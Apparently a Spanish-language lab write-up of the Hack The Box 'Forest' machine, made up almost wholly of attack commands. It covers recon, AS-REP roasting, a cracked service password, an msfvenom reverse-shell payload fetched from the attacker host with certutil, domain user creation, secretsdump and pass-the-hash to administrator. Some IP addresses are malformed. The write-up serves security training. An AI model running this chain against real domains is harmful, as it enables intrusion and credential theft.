nmap -A -p- -oA output 10.129.1.77 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA forest 10.129.1.77

nmap -sU -O -p- -oA forest-udp 10.129.1.77

nikto -h 10.129.1.77:80

gobuster dir -k -u http://10.129.1.77/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

nmapAutomator.sh 10.129.1.77 All

Como pense que tenia el puerto 53 abierto usamos dig

dig axfr htb.local @10.129.1.77

nmap -p 389 --script ldap-search 10.129.1.77

enum4linux 10.129.1.77 > forest_enum4linux-results.txt

Los usuarios de arriba los pones en un archivo llamado usuarios.txt

python3 /opt/impacket/examples/GetNPUsers.py htb.local/ -dc-ip 10.129.1.77 -request

Algunos de los usuarios en Kerberos pueden tener su pre-autenticacion desabilitado. Por eso podemos usar GetNPUsers de impacket. Corremos el comando de arriba y vemos que el Key Distribution Center nos regreso un TGT que esta encriptado con la contrasena de svc-alfresco.

Guardamos la contrasena encriptada en un archivo de texto forest_hash.txt

Usamos john para desencriptar la contrasena

smbmap -H htb.local -u svc-alfresco -p s3rvice

nmap -sS -p 1-65535 10.129.1.77

Vemos que wsman esta en el puerto 5985

Bajamos y el archivo de evil winrm https://github.com/Hackplayers/evil-winrm

./evil-winrm -i 10.129.1.77 -u svc-alfresco -p 's3rvice'

Ver los usuarios en el dominio

net user /domain

net user svc-alfresco

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

Bajamos el archivo Sharphound.exe y creamos un servidor en el puerto 8888

python3 -m http.server 8888

./SharpHound.exe

certutil -encode 20210526120309_BloodHound.zip forest.txt

type forest.txt

python2 /opt/impacket/examples/smbserver.py temp . -smb2support -username df -password df

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.146 LPORT=1337 -f exe > forest_shell.exe

certutil -f -split -urlcache http://10.10.14.146/forest_shell.exe

$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.146
msf5 exploit(multi/handler) > set LPORT 1337
msf5 exploit(multi/handler) > run

meterpreter > download 20210526120309_BloodHound.zip

A mi me costo setear bloodhound en kali entonces voy a usar esta imagen:

https://github.com/belane/docker-bloodhound

$ docker run -it \
-p 7474:7474 \
-e DISPLAY=unix$DISPLAY \
-v /tmp/.X11-unix:/tmp/.X11-unix \
--device=/dev/dri:/dev/dri \
--name bloodhound belane/bloodhound

docker cp 20210526120309_BloodHound.zip bloodhound:/20210526120309_BloodHound.zip

Le doy click a upload Data

Cambiamos y ponemos el usuario y su contrasena

neo4j console

bloodhound

Subimos el zip 20210526120309_BloodHound.zip

Buscamos ShortestPath from Owned Principles

Vamos a crear un usuario y esto es posible porque svc-alfresco es parte del grupo Account Operators.

net user cu3rv0x password /add /domain

El usuario cu3rv0x tiene permisos de GenericAll y Exchange Windows

net group "Exchange Windows Permissions" /add cu3rv0x

impacket-secretsdump htb.local/cu3rv0x:password@10.10.129.1.77

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.129.1.77